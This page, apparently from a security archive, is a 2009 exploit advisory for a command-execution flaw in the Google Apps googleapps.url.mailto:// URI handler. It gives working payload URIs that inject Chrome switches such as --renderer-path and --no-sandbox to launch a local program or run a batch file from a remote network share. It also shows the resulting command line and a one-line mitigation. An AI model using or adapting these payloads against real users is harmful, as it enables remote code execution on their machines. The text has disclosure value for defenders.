Google Apps googleapps.url.mailto:// URI Handler Command Execution

Google Apps googleapps.url.mailto:// URI Handler Command Execution: Posted Oct 2, 2009; Authored by Nine:Situations:Group::pyrokinesis | Site retrogod.altervista.org; Google Apps googleapps.url.mailto:// URI handler cross-browser remote command execution exploit.; tags | exploit, remote; SHA-256 | 0c678e6cf7fc660120636d96067744edfdfd49cbd4c321b556f33790b0924c47; Download | Favorite | View

Google Apps googleapps.url.mailto:// URI Handler Command Execution

google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer)
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/

software site: http://pack.google.com/intl/it/pack_installer.html

tested against: Internet Explorer 8, windows xp sp3
                Internet Explorer 7, windows xp sp3
                Google Chrome 2.0.172.43

vulnerability:
through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows:

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto]
@="Google Apps URL"
"EditFlags"=hex:02,00,00,00
"FriendlyTypeName"="Google Apps URL"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\DefaultIcon]
@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0"

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open\command]
@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe --mailto.google.com=\"%1\""

is possibile, against all versions of Internet Explorer, by injecting the "--domain=" switch
for the googleapps.exe executable to pass arbitrary switches to the Google Chrome chrome.exe
executable (which is subsequently launched to open the gmail pages),
example: the --renderer-path and --no-sandbox switches
Through them is possible to launch an arbitrary executable from the local system:


googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20--x"/


or to launch an arbitrary batch file from a remote network share:


googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x"/


the resulting command line for chrome.exe is in this case:

"C:\Programmi\Google\Chrome\Application\chrome.exe" --app=https://mail.google.com/a/--x --renderer-path=\\192.168.0.1\uncshare\sh.bat --no-sandbox

--x//?view=cm&fs=1&to=googleapps.url.mailto%3A%2F%2F&rlz=1R6GPCK_en___IT344

which leverages the remote command execution issue

Mitigation:

unregister the uri handler by deleting the mentioned registry keys

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Google Apps googleapps.url.mailto:// URI Handler Command Execution

Google Apps googleapps.url.mailto:// URI Handler Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Google Apps googleapps.url.mailto:// URI Handler Command Execution

Share This

Google Apps googleapps.url.mailto:// URI Handler Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems